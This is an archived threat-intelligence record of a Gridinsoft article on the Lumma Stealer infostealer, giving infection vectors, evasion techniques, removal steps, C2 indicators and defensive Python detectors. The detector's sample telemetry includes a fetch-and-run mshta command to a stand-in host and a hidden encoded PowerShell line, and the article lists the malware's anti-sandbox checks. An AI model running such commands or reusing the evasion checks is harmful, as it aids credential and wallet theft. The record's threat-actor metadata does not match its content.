{
	"id": "5b34f1d1-4f79-405d-9ad3-8ab1f9fccb1a",
	"created_at": "2026-04-06T00:11:00.488051Z",
	"updated_at": "2026-04-10T13:12:52.668918Z",
	"deleted_at": null,
	"sha1_hash": "656ed915e17564b90806ea9f3ccb162968ec55f0",
	"title": "Lumma Stealer: Advanced Threat Analysis \u0026 Protection Guide 2026",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1248213,
	"plain_text": "Lumma Stealer: Advanced Threat Analysis \u0026 Protection Guide 2026\r\nBy Gridinsoft LLC\r\nArchived: 2026-04-05 14:04:29 UTC\r\nYou download what looks like an innocent software crack or click a link from someone on Discord. Hours later, your cryptocurrency wallets are emptied, banking credentials stolen, and accounts compromised. This isn't random bad luck: you've encountered Lumma Stealer, an increasingly sophisticated information-stealing malware that's rapidly becoming one of the most dangerous threats to personal and financial data.\r\nWhat is Lumma Stealer?\r\nLumma Stealer (also known as LummaC2) is a sophisticated information-stealing malware that emerged in late 2022, with widespread distribution beginning in early 2023. Written in C++, it's specifically designed to harvest sensitive data from infected systems, with a particular focus on cryptocurrency wallets, browser credentials, and two-factor authentication (2FA) extensions.\r\nDeveloped by a threat actor known as \"Shamel\" (operating under the alias \"Lumma\"), this malware is distributed through a Malware-as-a-Service (MaaS) model on Russian-speaking cybercriminal forums. 
What sets Lumma apart from other stealers is its exceptional evasion capabilities, rapid development cycle, and focus on cryptocurrency theft.\r\nLumma Stealer Key Features\r\nAdvanced anti-analysis techniques to evade security software\r\nComprehensive browser data theft (passwords, cookies, form data)\r\nCryptocurrency wallet targeting (40+ wallets supported)\r\nTwo-factor authentication (2FA) extension theft\r\nMultiple infection vectors including cracked software, Discord, and email\r\nSophisticated command and control infrastructure\r\nRegular updates and feature additions\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 1 of 13\n\nInformation stealers like Lumma represent one of the fastest-growing threats to personal and enterprise data security, with a 135% increase in detections throughout 2023.\r\nLumma Stealer: Evolution and Impact\r\nWithin months of its initial appearance, Lumma Stealer achieved remarkable success in the cybercriminal ecosystem. By mid-2023, darknet forums were offering Lumma logs (stolen data packages) at volumes comparable to established players like Vidar and Raccoon Stealer.\r\n[Chart: Infostealer Market Share Evolution (2022-2024). Quarterly share, Q4 2022 to Q2 2024, for RedLine, Raccoon, Vidar and Lumma. Source: analysis of darknet forum offerings and security reports from 2022-2024]\r\nLumma's rise coincides with an increase in cryptocurrency-related theft. 
According to the CISA cybersecurity advisory, information stealers like Lumma have contributed to over $5.2 billion in cryptocurrency theft since 2022.\r\nCommercial Offering and Pricing Structure\r\nLumma Stealer operates on a subscription-based model with different pricing tiers:\r\nBasic Package: $250/month\r\nPremium Package: $500/month\r\nEnterprise Package: $1000/month\r\nLifetime Access: $5000 (one-time)\r\nThe higher-tier packages include additional features such as session cookie theft (a stolen cookie keeps working until the service revokes that session, which a password change alone does not always do), AI-assisted log filtering, custom builds with enhanced evasion, and dedicated customer support.\r\n[Image: Subscription plans advertised on a darknet forum]\r\nLumma Stealer Infection Vectors\r\nLumma Stealer employs multiple distribution methods to maximize its reach. Each approach is tailored to appear legitimate and avoid raising the user's suspicion.\r\n1. Cracked Software and Pirated Applications\r\nThe most common vector for Lumma Stealer infections is cracked software. This method is particularly effective because:\r\nUsers downloading pirated software often intentionally disable security tools\r\nCracked software is expected to trigger some security warnings, so users are more likely to ignore them\r\nThe installation process provides cover for malware execution\r\nThreat actors use SEO poisoning to promote malicious websites offering free versions of popular software. When users download and execute these pirated applications, a staged loader downloads and executes the Lumma Stealer payload.\r\nHacked YouTube Channels Campaign (January 2024)\r\nIn January 2024, security researchers identified a campaign in which threat actors compromised YouTube accounts with substantial followings. 
These hijacked channels posted videos promoting free software, with download links leading to Lumma Stealer installers.\r\n[Image: Compromised YouTube channel promoting a malicious download]\r\n2. Discord Social Engineering\r\nDiscord has become a prime channel for Lumma Stealer distribution because of its popularity among gamers and cryptocurrency enthusiasts. The attack typically follows this pattern:\r\n1. Attackers join popular Discord servers or send unsolicited direct messages\r\n2. They build rapport or immediately send messages with malicious links or files\r\n3. Messages often disguise payloads as game mods, cheat tools, or free software\r\n4. When executed, the payload connects to the command server to download Lumma Stealer\r\n[Image: Discord message promoting malware disguised as a game that needs testing]\r\n3. Phishing Emails and Malicious Attachments\r\nWhile less common than the previous methods, phishing emails remain an effective distribution vector for Lumma Stealer. These typically take the form of:\r\nFake invoice or shipping notification emails with malicious attachments\r\nSpear-phishing campaigns targeting specific individuals or organizations\r\nFake job offers with \"application forms\" containing embedded malware\r\n4. Fake CAPTCHA Pages\r\nA more recent infection method redirects users to fake CAPTCHA verification pages. According to Trojan Killer security analysis, these pages claim to verify that the visitor is human, but the verification is the infection: the page's JavaScript copies a command to the clipboard and instructs the visitor to paste it into the Windows Run dialog (Win+R, Ctrl+V, Enter). That command launches mshta.exe or PowerShell, which fetches the next stage and ultimately deploys Lumma Stealer. Because the browser never downloads a file, download scanning sees nothing; the user's own keystrokes start the chain.\r\nLumma Stealer Technical Analysis\r\nLumma Stealer employs a multi-stage infection process designed to evade detection and analysis.\r\nInfection Chain Overview\r\nTypical Lumma Stealer Attack Sequence\r\n1. 
Initial Access: User downloads a crack or malicious file, or clicks a compromised link\r\n2. Stage 1 Loader: Typically a PowerShell or JavaScript downloader with basic obfuscation\r\n3. Environment Checks: Verifies the system is not a virtual machine or analysis environment\r\n4. Payload Download: Retrieves the encrypted Lumma DLL from the C2 server\r\n5. Process Injection: Injects malicious code into legitimate Windows processes\r\n6. Data Collection: Harvests credentials, cookies, crypto wallets, and system information\r\n7. Data Exfiltration: Encrypts and sends stolen data to the C2 server\r\n8. Self-Cleanup: Removes evidence of infection (optional feature)\r\nThe infection typically begins with a staged loader, a small script that performs preliminary system checks before downloading the main Lumma Stealer payload. This approach has several advantages for the attacker:\r\nSmaller initial file size, which is less likely to trigger security alerts\r\nAbility to customize the payload based on the victim's system configuration\r\nOption to abort the infection if security tools or analysis environments are detected\r\nWhat makes Lumma especially interesting is its use of legitimate public platforms as dead-drop resolvers rather than relying on hardcoded C2 addresses alone: the malware fetches a public profile page (Steam Community profiles are the best-documented case) and decodes the current C2 domain from the text of that page. The first outbound request therefore looks like ordinary traffic to a well-known site, and operators can rotate C2 domains without rebuilding the payload. Blocking only the domains embedded in a sample is not enough, because the sample can learn a fresh one.\r\nDetection Evasion Techniques\r\nLumma Stealer employs an extensive array of anti-analysis techniques to evade detection by security solutions and researchers. These evasion methods have contributed significantly to its rapid rise in popularity among cybercriminals.\r\nAnti-VM and Anti-Sandbox Techniques\r\nUpon execution, Lumma conducts thorough system checks to determine whether it is running in a virtualized environment or an analysis sandbox. 
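The process chain in the attack sequence above (a script host started from the Run dialog, a PowerShell downloader, a payload hollowed into BitLockerToGo.exe, a batch script, an AutoIt interpreter) is visible in process-creation telemetry even when every stage on disk is encrypted. The following Python is an added example written for this page, not code from Gridinsoft or from the malware: it runs four parent/child rules over a constructed set of Sysmon-style process events (image basenames only; the pids, parents and command lines are made up for the demonstration) and returns which pids match which rule.

```python
# Constructed Sysmon-style process-creation events (not real telemetry).
# Only image basenames are kept; pids, parents and command lines are made up.
EVENTS = [
    {'pid': 100, 'ppid': 1, 'image': 'explorer.exe', 'cmdline': 'explorer.exe'},
    # Fake CAPTCHA (ClickFix): the victim pastes a command into the Run dialog,
    # so the script host is a direct child of explorer.exe and reaches out to a URL.
    {'pid': 200, 'ppid': 100, 'image': 'mshta.exe',
     'cmdline': 'mshta https://verify-captcha.example/verify'},
    {'pid': 210, 'ppid': 200, 'image': 'powershell.exe',
     'cmdline': 'powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBi'},
    # Later stages from the ATT&CK table on this page: payload hollowed into
    # BitLockerToGo.exe, which runs a batch script that starts an AutoIt interpreter.
    {'pid': 300, 'ppid': 210, 'image': 'BitLockerToGo.exe', 'cmdline': 'BitLockerToGo.exe'},
    {'pid': 310, 'ppid': 300, 'image': 'cmd.exe', 'cmdline': 'cmd /c killing.bat'},
    {'pid': 320, 'ppid': 310, 'image': 'AutoIt3.exe', 'cmdline': 'AutoIt3.exe script.a3x'},
    # Benign noise: an administrator running PowerShell from a terminal window.
    {'pid': 400, 'ppid': 100, 'image': 'WindowsTerminal.exe', 'cmdline': 'wt.exe'},
    {'pid': 410, 'ppid': 400, 'image': 'powershell.exe', 'cmdline': 'powershell Get-Process'},
]

SCRIPT_HOSTS = {'mshta.exe', 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe'}
ENCODED_FLAGS = ('-enc', '-encodedcommand', '-e ')

def ancestor_images(pid, procs):
    '''Lower-cased image names of every ancestor, nearest first; stops at unknown pids.'''
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        parent = procs.get(procs[pid]['ppid'])
        if parent is None:
            return
        yield parent['image'].lower()
        pid = parent['pid']

def detect(events):
    '''Return (pid, rule) pairs for events matching the Lumma execution chain.'''
    procs = {e['pid']: e for e in events}
    alerts = []
    for e in events:
        image = e['image'].lower()
        cmd = e['cmdline'].lower()
        parent = procs.get(e['ppid'])
        parent_image = parent['image'].lower() if parent else ''
        # Rule 1: script host spawned by explorer.exe (Run dialog) that fetches a URL
        # or carries an encoded command; terminals and IDEs have a different parent.
        if (parent_image == 'explorer.exe' and image in SCRIPT_HOSTS
                and ('http' in cmd or any(flag in cmd for flag in ENCODED_FLAGS))):
            alerts.append((e['pid'], 'clickfix_run_dialog'))
        # Rule 2: mshta.exe handing off to PowerShell is the stage-1 loader pattern.
        if image in ('powershell.exe', 'pwsh.exe') and parent_image == 'mshta.exe':
            alerts.append((e['pid'], 'mshta_to_powershell'))
        # Rule 3: BitLockerToGo.exe has no legitimate reason to start a shell or script host.
        if parent_image == 'bitlockertogo.exe' and image in SCRIPT_HOSTS:
            alerts.append((e['pid'], 'bitlockertogo_spawns_shell'))
        # Rule 4: an AutoIt interpreter anywhere beneath a BitLockerToGo.exe process.
        if 'autoit' in image and 'bitlockertogo.exe' in set(ancestor_images(e['pid'], procs)):
            alerts.append((e['pid'], 'autoit_under_bitlockertogo'))
    return alerts

if __name__ == '__main__':
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Rule 1 keys on explorer.exe as the parent because a command pasted into the Run dialog is spawned by explorer.exe, which is exactly what the fake CAPTCHA pages rely on; a PowerShell session opened from a terminal has a different parent and is left alone. Rules 3 and 4 encode the ATT&CK rows on this page: BitLockerToGo.exe never legitimately launches cmd.exe or an AutoIt interpreter, so either is worth an alert on its own.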
The malware calls the Windows function GetForegroundWindow and compares the window title against the names of known debugging tools:\r\nIDA Pro\r\nHyperDbg\r\nx32dbg / x64dbg\r\nAny window with \"debug\" in the title\r\nCheat Engine\r\nWinDbg\r\nOllyDbg\r\nImmunity Debugger\r\ndnSpy\r\nLumma also checks for sandbox environments by looking for DLLs associated with security and sandboxing products such as:\r\n360 Total Security\r\nSandboxie\r\nCuckoo Sandbox\r\nComodo Containment\r\nTo evade Wine-based analysis (used in some Linux analysis environments), Lumma searches for the wine_get_unix_file_name export in kernel32.dll or ntdll.dll; that export exists only under Wine.\r\nUsername and System Property Analysis\r\nLumma also compares the current username against common sandbox defaults:\r\nCurrentUser\r\nVirus\r\nSandbox\r\ntest user\r\nmalware\r\nmaltest\r\nWDAGUtilityAccount\r\nJohn Doe\r\nThe malware also examines system properties for virtualization indicators:\r\nChecks .sys files in system32 for virtualization drivers\r\nScans device identifiers for generic VM vendor names\r\nInspects running services for VM-related processes\r\nAnalyzes hardware information for virtualization artifacts\r\nIf any of these checks indicate an analysis environment, Lumma terminates without running its payload, so a sandbox whose default user is \"John Doe\" or that has a debugger window open records nothing but a clean exit. Analysis environments should therefore use realistic usernames, keep debugger windows hidden or renamed, and avoid injecting sandbox helper DLLs into the sample's process.\r\nCode Obfuscation and Encryption\r\nLumma employs several obfuscation techniques to hide its malicious code:\r\nString Encryption: All hardcoded strings are encrypted to avoid static analysis\r\nControl Flow Obfuscation: Code flow is deliberately complicated with junk instructions\r\nPayload Concealment: Encrypted payload is stored in PNG resource files\r\nAPI Call Hiding: Windows API calls are resolved dynamically at runtime\r\nThese techniques make static analysis and signature-based detection considerably harder.\r\nData Theft Capabilities\r\nAfter bypassing security measures, Lumma 
Stealer focuses on its primary objective: harvesting valuable data from the infected system.\r\nCommunication with Command \u0026 Control\r\nBefore beginning data collection, Lumma establishes communication with its command and control (C2) server. Each sample contains encrypted addresses for the primary C2 server and several backup servers, and the malware tries each in sequence until one responds, so a single blocked or sinkholed domain does not stop the sample.\r\nCommunication with the C2 server uses encrypted HTTP POST requests, which lets the malware blend in with legitimate web traffic and makes content-based network detection difficult; the destination addresses (see the Indicators of Compromise section) are the more reliable network signal.\r\nData Collection Targets\r\n[Image: Example of data collected by Lumma Stealer]\r\nLumma Stealer targets an extensive range of data sources:\r\nBrowser Data\r\nCredentials: Usernames and passwords from all major browsers\r\nCookies: Browser cookies, including persistent authentication cookies\r\nAutofill Data: Saved addresses, credit cards, and form data\r\nBrowsing History: Complete browsing history logs\r\nCryptocurrency Data\r\nWallet Extensions: Data from 40+ browser-based crypto wallet extensions\r\nWallet Files: Local cryptocurrency wallet files and keys\r\nWallet Applications: Data from desktop cryptocurrency applications\r\nSystem Information\r\nHardware Details: CPU, RAM, GPU specifications\r\nSoftware Inventory: Installed applications and versions\r\nNetwork Configuration: IP address, hostname, MAC address\r\nUser Information: Username, language settings, time zone\r\n[Image: Code segment specifying browser and crypto wallet targets]\r\nThe premium version of Lumma adds theft of persistent session cookies. A stolen cookie stays valid until the service revokes that session, and many services do not revoke existing sessions when the password is changed. 
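The environment checks from the Detection Evasion section above are easy to turn around: before detonating a sample, audit the analysis VM for the exact artifacts Lumma looks for. The Python below is an added example for this page, not Gridinsoft's code and not the malware's. The debugger window titles, usernames and the Wine export are the ones listed on this page; the DLL names for the four sandbox products (SbieDll.dll, cuckoomon.dll, cmdvrt32.dll/cmdvrt64.dll, SxIn.dll) are assumed, since the page names the products but not their modules. The two VM profiles are constructed, not measured.

```python
# Window titles, usernames and the Wine export are those listed on this page.
DEBUGGER_TITLES = ('ida pro', 'hyperdbg', 'x32dbg', 'x64dbg', 'cheat engine',
                   'windbg', 'ollydbg', 'immunity debugger', 'dnspy', 'debug')
SANDBOX_USERNAMES = {'currentuser', 'virus', 'sandbox', 'test user',
                     'malware', 'maltest', 'wdagutilityaccount', 'john doe'}
WINE_EXPORT = 'wine_get_unix_file_name'
# ASSUMED module names for the products the page lists; the page names only the products.
SANDBOX_MODULES = {
    'sbiedll.dll': 'Sandboxie',
    'cuckoomon.dll': 'Cuckoo Sandbox',
    'cmdvrt32.dll': 'Comodo Containment',
    'cmdvrt64.dll': 'Comodo Containment',
    'sxin.dll': '360 Total Security',
}

def audit_environment(username, window_titles, loaded_modules, kernel32_exports):
    '''Return the Lumma checks this environment would trip (empty list = looks real).'''
    findings = []
    # Username compared case-insensitively, as the stealer has no reason to be strict.
    if username.strip().lower() in SANDBOX_USERNAMES:
        findings.append('username:' + username)
    # GetForegroundWindow title compared against debugger names (substring match).
    for title in window_titles:
        lowered = title.lower()
        if any(marker in lowered for marker in DEBUGGER_TITLES):
            findings.append('window:' + title)
    # Sandbox helper DLLs present in the sample's own process.
    for module in loaded_modules:
        product = SANDBOX_MODULES.get(module.lower())
        if product:
            findings.append('module:' + module + ' (' + product + ')')
    # Wine exposes this export from kernel32/ntdll; real Windows never does.
    if WINE_EXPORT in kernel32_exports:
        findings.append('wine_export:' + WINE_EXPORT)
    return findings

def sample_would_run(env):
    '''True when none of the documented checks fire, i.e. the sample would proceed.'''
    return not audit_environment(**env)

# Constructed VM profiles (not measurements of any real system).
NAIVE_VM = {
    'username': 'John Doe',
    'window_titles': ['x64dbg - sample.exe', 'Untitled - Notepad'],
    'loaded_modules': ['ntdll.dll', 'kernel32.dll', 'SbieDll.dll'],
    'kernel32_exports': {'CreateFileW', 'wine_get_unix_file_name'},
}
HARDENED_VM = {
    'username': 'mwilliams',
    'window_titles': ['Untitled - Notepad', 'Q3 budget.xlsx - Excel'],
    'loaded_modules': ['ntdll.dll', 'kernel32.dll'],
    'kernel32_exports': {'CreateFileW'},
}

if __name__ == '__main__':
    for name, env in (('naive', NAIVE_VM), ('hardened', HARDENED_VM)):
        print(name, audit_environment(**env))
```

An empty result means none of the documented checks would fire. The naive profile fails four of them at once, which is why a stock sandbox frequently records nothing but a clean exit for a Lumma sample; the hardware and driver checks the page also lists are not modelled here because they need a real Windows host to enumerate.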
For the attacker, a valid stolen cookie means continued access to the account, without the password or a second factor, until the victim signs out of all sessions or the service expires them; changing the password alone does not end the intrusion.\r\nData Exfiltration\r\nAfter collecting data, Lumma compresses and encrypts it before transmission to the C2 server. The encryption prevents network security tools from recognising the stolen information by content as it leaves the network.\r\nAccording to Gridinsoft security research, Lumma Stealer provides a C2 panel with AI-assisted filtering to organize stolen data and identify the most valuable targets. This filtering helps attackers prioritize high-value victims for further exploitation.\r\nWarning Signs of Lumma Stealer Infection\r\nDetecting a Lumma Stealer infection can be challenging because the malware is designed to be quiet, but several indicators may suggest a system has been compromised:\r\nSystem Performance Issues\r\nUnexplained system slowdowns, especially during browsing sessions\r\nIncreased CPU usage when no resource-intensive applications are running\r\nBrowser crashes or unusual behavior when accessing secure websites\r\nAccount Security Anomalies\r\nUnexpected account logouts or password reset notifications\r\nUnauthorized transactions in financial accounts or cryptocurrency wallets\r\nLogin notification emails from services you didn't access\r\nTwo-factor authentication prompts you didn't initiate\r\nSuspicious Network and Browser Activity\r\nUnusual outbound connections to unfamiliar IP addresses\r\nIncreased network activity when the system should be idle\r\nBrowser extensions you don't remember installing\r\nAn infostealer typically finishes its collection within seconds and may remove itself afterwards, so the account anomalies are often the only symptom; a system that looks clean now does not rule out an infection that has already run.\r\nIf you notice any of these warning signs, it's crucial to take immediate action to verify and address a potential infection.\r\nHow to Remove Lumma Stealer\r\nIf you suspect your system has been infected with Lumma Stealer, follow these steps to remove the malware and secure your accounts:\r\nWindows Removal Steps\r\n1. 
Disconnect from the internet (or isolate the host) to prevent further data exfiltration\r\n2. Boot into Safe Mode with Networking (restart while holding Shift, then Troubleshoot → Advanced options → Startup Settings → Restart → press F5); reconnect only for as long as the scanner needs to update\r\n3. Run a full system scan with an updated anti-malware solution\r\n4. Remove any identified threats following your security software's recommendations\r\n5. Check Task Manager for unusual processes and remove any suspicious startup items\r\n6. Reset all browsers or reinstall them completely\r\nFor more comprehensive removal, consider using specialized anti-malware tools:\r\nGridinSoft Anti-Malware - Our specialized tool with infostealer detection capabilities\r\nMicrosoft Defender - Built-in Windows security with regular updates for new threats\r\nPost-Infection Security Measures\r\nAfter removing Lumma Stealer, take these critical steps to secure your accounts and prevent further damage. Assume everything the browser had saved (passwords, cookies, autofill data, wallet extension data) is already in the attacker's hands:\r\n1. Change all passwords from a clean device (not the previously infected one), and on every service use the \"sign out of all sessions\" or \"revoke all tokens\" option so that stolen cookies stop working\r\n2. Enable two-factor authentication on all accounts that support it\r\n3. Monitor financial accounts for unauthorized transactions\r\n4. Revoke and reissue API keys for developer accounts\r\n5. Create new cryptocurrency wallets and transfer funds from potentially compromised wallets\r\n6. Check browser extensions and remove any you don't recognize\r\nHow to Protect Against Lumma Stealer\r\nPreventing a Lumma Stealer infection is far easier than dealing with its aftermath. 
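Where proxy or DNS logs are retained, the indicators from the Indicators of Compromise section below can be swept against them retrospectively, which matters for an infostealer because the theft is usually over before anyone looks. The Python below is an added example written for this page, not Gridinsoft's code: it refangs the page's own defanged indicators (a subset is embedded), matches destination IPs exactly and hostnames by exact or subdomain match, and flags HTTP POSTs to an indicator as consistent with the encrypted POST exfiltration described above. The log lines are constructed for the demonstration and follow an assumed six-field layout.

```python
import ipaddress

# Indicators copied from the IoC section of this page (a subset), defanged as printed there.
PAGE_IOCS = '''
176.113.115.224
45.9.74.78
82.117.255.127
futureddospzmvq[.]shop
writerospzm[.]shop
celebratioopz[.]shop
'''

# Constructed proxy log lines (not real traffic). Assumed layout:
# timestamp src_ip dst_ip host method path   (host is '-' for raw-IP requests)
SAMPLE_LOG = '''
2026-04-01T10:00:01Z 10.0.0.15 93.184.216.34 www.example.com GET /
2026-04-01T10:00:07Z 10.0.0.15 82.117.255.127 writerospzm.shop POST /api
2026-04-01T10:00:09Z 10.0.0.22 203.0.113.9 cdn.writerospzm.shop GET /img.png
2026-04-01T10:01:30Z 10.0.0.15 176.113.115.224 - POST /api
2026-04-01T10:02:00Z 10.0.0.31 198.51.100.4 shop.example.com GET /cart
'''

def refang(indicator):
    '''Undo the usual defanging conventions so indicators compare against real logs.'''
    return indicator.strip().replace('[.]', '.').replace('hxxp', 'http').lower()

def load_indicators(text):
    '''Split a defanged indicator list into a set of IPs and a set of domains.'''
    ips, domains = set(), set()
    for raw in text.splitlines():
        indicator = refang(raw)
        if not indicator:
            continue
        try:
            ipaddress.ip_address(indicator)
            ips.add(indicator)
        except ValueError:
            domains.add(indicator)
    return ips, domains

def host_matches(host, domains):
    '''Exact match or subdomain of a listed domain; shop.example.com must not match *.shop.'''
    host = host.lower().rstrip('.')
    return any(host == d or host.endswith('.' + d) for d in domains)

def match_log(log_text, ips, domains):
    '''One record per log line touching an indicator; POSTs are flagged as likely exfil.'''
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue
        ts, src, dst, host, method, path = fields
        reasons = []
        if dst in ips:
            reasons.append('ip')
        if host != '-' and host_matches(host, domains):
            reasons.append('domain')
        if reasons:
            hits.append({'ts': ts, 'src': src, 'dst': dst, 'host': host, 'method': method,
                         'path': path, 'reasons': reasons, 'likely_exfil': method == 'POST'})
    return hits

def affected_sources(hits):
    '''Internal hosts to isolate and sweep for the stealer, in a stable order.'''
    return sorted({h['src'] for h in hits})

if __name__ == '__main__':
    ips, domains = load_indicators(PAGE_IOCS)
    for hit in match_log(SAMPLE_LOG, ips, domains):
        print(hit)
```

Subdomain matching is deliberate: operators front C2 domains with arbitrary labels, but the suffix check is anchored on a dot so that an unrelated host under a similar-looking name does not match. Any internal source that appears in the results should be treated as infected and the post-infection steps above applied to its users, whether or not the scanner still finds a sample.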
Implement these security practices to protect your system:\r\nSoftware and System Security\r\nAvoid pirated software and cracks - the most common Lumma infection vector\r\nKeep your operating system and applications updated with the latest security patches\r\nUse a reputable security solution with real-time protection\r\nEnable Windows Defender SmartScreen to block malicious downloads\r\nImplement application control policies in enterprise environments\r\nSafe Browsing Practices\r\nBe skeptical of unsolicited messages on Discord, social media, or email\r\nDownload software from official websites only\r\nCheck URLs carefully before entering credentials or downloading files\r\nAvoid clicking on suspicious links, especially those promising free software\r\nBe wary of fake CAPTCHA pages that prompt you to run code or download files; no legitimate CAPTCHA asks you to open the Run dialog or paste a command\r\nCryptocurrency Security\r\nUse hardware wallets for storing significant cryptocurrency assets\r\nUse separate browsing environments for financial activities\r\nConsider a dedicated device for cryptocurrency transactions\r\nRegularly audit installed browser extensions\r\nFor enterprise environments, consider these additional protections recommended by Microsoft Security:\r\nRestrict PowerShell and script execution using AppLocker or Windows Defender Application Control\r\nDeploy network monitoring solutions to detect suspicious outbound connections\r\nImplement least privilege access controls to limit the impact of compromised accounts\r\nConduct regular security awareness training focusing on current social engineering tactics\r\nLumma Stealer Indicators of Compromise (IoC)\r\nSecurity professionals can use these indicators to identify potential Lumma Stealer infections in their environment. The table below maps the observed operations, in execution order, to MITRE ATT\u0026CK techniques:\r\nOperation | MITRE ATT\u0026CK technique(s)\r\nFake CAPTCHA verification page | T1566 Phishing\r\nUser executes the initial PowerShell code | T1204 User Execution; T1059.001 Command and Scripting Interpreter: PowerShell\r\nPayload downloaded via mshta.exe carrying an overlaid script | T1218.005 System Binary Proxy Execution: Mshta; T1027.009 Obfuscated Files or Information: Embedded Payloads\r\nPowerShell downloads and executes Lumma Stealer | T1059.001 Command and Scripting Interpreter: PowerShell\r\nEncrypted payload executed via powershell.exe | T1059.001 Command and Scripting Interpreter: PowerShell; T1027.013 Obfuscated Files or Information: Encrypted/Encoded File\r\nLumma payload injected into BitLockerToGo.exe | T1055.012 Process Injection: Process Hollowing\r\nInjected process runs the killing.bat script | T1059.003 Command and Scripting Interpreter: Windows Command Shell\r\nBatch script enumerates processes and starts AutoIt | T1057 Process Discovery\r\nAutoIt interpreter executes the script | T1059.010 Command and Scripting Interpreter: AutoHotKey \u0026 AutoIT\r\nInformation collection | T1217 Browser Information Discovery; T1083 File and Directory Discovery\r\nExfiltration | T1041 Exfiltration Over C2 Channel\r\nCommonly Used C2 Domains and IP Addresses\r\nSecurity teams should monitor for connections to these known Lumma Stealer command and control servers:\r\n176.113.115.224\r\n176.113.115.226\r\n176.113.115.227\r\n176.113.115.229\r\n176.113.115.232\r\n144.76.173.247\r\n45.9.74.78\r\n77.73.134.68\r\n82.117.255.127\r\n82.117.255.80\r\n82.118.23.50\r\nSuspicious Domains\r\nThese domains have been associated with Lumma Stealer distribution campaigns:\r\nfutureddospzmvq[.]shop\r\nwriterospzm[.]shop\r\nmennyudosirso[.]shop\r\ndeallerospfosu[.]shop\r\nquialitsuzoxm[.]shop\r\ncomplaintsipzzx[.]shop\r\nbassizcellskz[.]shop\r\nlanguagedscie[.]shop\r\ncelebratioopz[.]shop\r\nLumma infrastructure rotates quickly, so treat these addresses and domains as historical indicators for retrospective hunting and alert on the behaviours in the table as well; the pseudo-random second-level labels under the .shop TLD are a recurring pattern in Lumma C2 domains.\r\nRelated Resources\r\nFor more detailed information about Lumma Stealer and similar threats, refer to these 
resources:\r\nFake CAPTCHA Sites Trick Users to Run Lumma Stealer\r\nLumma Stealer Spreads Via Fake Browser Updates\r\nHow to Detect, Remove, and Prevent Infostealer Infections\r\nComprehensive Malware Removal Guide\r\nSpyware Removal and Protection\r\nSource: https://gridinsoft.com/spyware/lumma-stealer",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gridinsoft.com/spyware/lumma-stealer"
	],
	"report_names": [
		"lumma-stealer"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434260,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/656ed915e17564b90806ea9f3ccb162968ec55f0.pdf",
		"text": "https://archive.orkl.eu/656ed915e17564b90806ea9f3ccb162968ec55f0.txt",
		"img": "https://archive.orkl.eu/656ed915e17564b90806ea9f3ccb162968ec55f0.jpg"
	}
}